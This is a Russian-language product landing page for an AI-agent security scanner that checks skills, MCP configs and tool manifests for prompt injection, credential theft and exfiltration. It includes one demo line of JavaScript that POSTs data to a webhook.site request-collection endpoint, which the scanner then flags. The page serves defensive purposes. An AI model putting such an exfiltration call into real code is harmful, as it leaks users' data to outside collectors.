Сканирование безопасности для ИИ-агентов
Узнайте, что делает скилл, прежде чем его запустит ваш агент.
Ryzek читает скиллы, конфиги MCP-серверов и манифесты инструментов и помечает prompt injection, скрытые инструкции, кражу учётных данных, избыточные разрешения и инструменты, изменившиеся после вашего одобрения. Каждая находка сопровождается оценкой уверенности и причиной.
Тариф Free: 20 сканирований в месяц со всеми правилами. Просканированные файлы читаются в памяти и никогда не хранятся.
const ENDPOINT = "https://webhook.site/0000-demo"; await fetch(ENDPOINT, { method: "POST", body: JSON.stringify(notes),});
Ryzek нашёл 1 находку
Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.
webhook.site
Реальный вывод сканера, сгенерированный при сборке этой страницы.
Трейлер
Ryzek за восемьдесят секунд.
Что незаметно передают агентам — и что Ryzek показывает вам до того, как они это запустят.
Как это работает
От загрузки до вердикта, на основе которого можно действовать.
Ничего устанавливать не нужно. Войдите, добавьте файлы, прочитайте, что нашёл Ryzek и почему.
-
01 · Войдите
Создать бесплатный аккаунт
Войдите с аккаунтом, который у вас уже есть. Ваш лимит сканирований и история инструментов следуют за вами на любое устройство.
-
02 · Добавьте файлы
Загрузите то, что использует ваш агент
Папки скиллов с их скриптами, конфиги MCP, манифесты инструментов,
package.jsonилиrequirements.txt. -
03 · Читайте
Получайте причину, а не просто флаг
Каждая находка показывает критичность, насколько уверен Ryzek, почему, точный текст, который её вызвал, и её категорию OWASP.
-
04 · Повторное сканирование
Узнавайте, когда меняется инструмент
Ryzek хранит отпечаток каждого инструмента — не сам файл, — чтобы следующее сканирование могло сообщить вам, изменилось ли то, что вы одобрили.
Что он ловит
54 правил для пяти видов риска.
У каждого правила есть живая демонстрация на странице правил: файл, важная его часть и то, что сканер реально сообщает.
18 правил · Безопасность агента
Текст, нацеленный на ИИ
Prompt injection, инструкции, скрытые в комментариях или невидимых символах, подделанные результаты инструментов и отравление памяти.
5 правил · Эксфильтрация
Пути, по которым ваши данные могут утечь
Точки сбора данных, DNS-туннелирование, маячки в изображениях и инструменты, сочетающие приватное чтение с публичной записью.
7 правил · Учётные данные
Секреты не на своём месте
Жёстко прописанные ключи, токены в конфигах MCP, чтение хранилищ учётных данных и истории команд оболочки, а также запросы к метаданным облака.
13 правил · Цепочка поставок
Откуда взялся код
Незакреплённые и выдающие себя за других серверы, версии с известными уязвимостями, install-хуки, теневые серверы и инструменты, изменившиеся после одобрения.
11 правил · Исполнение
Больше прав, чем нужно для задачи
Избыточные разрешения, автоматически одобренные инструменты, побеги из песочницы, закрепление в системе и инъекция команд.
Все правила
Смотреть все демонстрации →
Фильтруйте по риску, читайте объяснение простым языком и смотрите реальный результат для каждого правила.
Почему Ryzek
Проверяемые находки от сканера, который честно говорит, где его пределы.
Сканер, который кричит «волк» по любому поводу, начинают игнорировать, а тот, что преувеличивает свои возможности, — получает доверие, которого не заслуживает. Ryzek создан так, чтобы избегать и того, и другого.
Узнайте, чего Ryzek не видит — включая поведение, которое проявляется только во время работы сервера, и то, что скрыто внутри скомпилированных программ.
- Указанная причина для каждой находки. Насколько уверено правило и почему — чтобы слабый сигнал не выглядел как подтверждённая атака.
- Обнаружение изменений. Инструмент, незаметно изменившийся после вашего одобрения, будет помечен при следующем сканировании.
- Ваши файлы не сохраняются. Загрузки сканируются в памяти и удаляются. Мы храним счётчики сканирований и отпечатки инструментов, никогда не содержимое.
- Привязано к OWASP. Каждое правило относится к категории в OWASP MCP Top 10.
- Каждое правило на каждом тарифе. Платные тарифы добавят объём и автоматизацию, но не обнаружение.
Тарифы
Начните бесплатно. Все правила включены.
Бесплатный тариф запускает полный набор правил, ограниченный только по объёму. Платные тарифы с более высокими лимитами скоро откроются.
Доступно сейчас
Free — 0 $
20 сканирований в месяц, все 54 правил, обнаружение изменений и отчёты для скачивания.
Скоро откроется
Pro, Pro Plus и Teams
От 16 $ в месяц, от 300 до 1500 сканирований в месяц. Смотрите, что входит, и попросите сообщить вам, когда они откроются.
Вопросы
Частые вопросы.
Вы храните файлы, которые я сканирую?
Нет. Файлы отправляются на сканер по HTTPS, сканируются в памяти и удаляются, как только приходит результат. Мы храним только количество использованных сканирований и отпечаток каждого инструмента — хеши плюс метки его разрешений, — чтобы сообщить вам, если он изменится. Подробности — в политике конфиденциальности.
Зачем нужен аккаунт?
Так ваш лимит сканирований и история инструментов следуют за вами. Обнаружение изменений работает, только если Ryzek помнит, как инструмент выглядел при прошлом сканировании.
Какие файлы можно сканировать?
Папки скиллов (SKILL.md и скрипты рядом с ним), конфигурационные файлы MCP, такие как .mcp.json или claude_desktop_config.json, JSON-манифесты инструментов, и package.json или requirements.txt для install-хуков и уязвимых зависимостей.
Значит ли чистый результат, что скилл безопасен?
Нет — это значит, что ни одно из 54 правил не сработало. Ryzek читает файлы, а не запускает их, поэтому поведение, проявляющееся только во время выполнения, или то, что скрыто внутри скомпилированной программы, вне зоны его видимости. Чистое сканирование — хороший знак, но не гарантия.
Можно ли запускать это в CI?
Пока нет. Интеграция с CI запланирована для платных тарифов. Если это важно для вас, сообщите нам — это помогает решить, что сделать в первую очередь.
Просканируйте скиллы, которым уже доверяет ваш агент.
Регистрация и добавление первых файлов займёт минуту.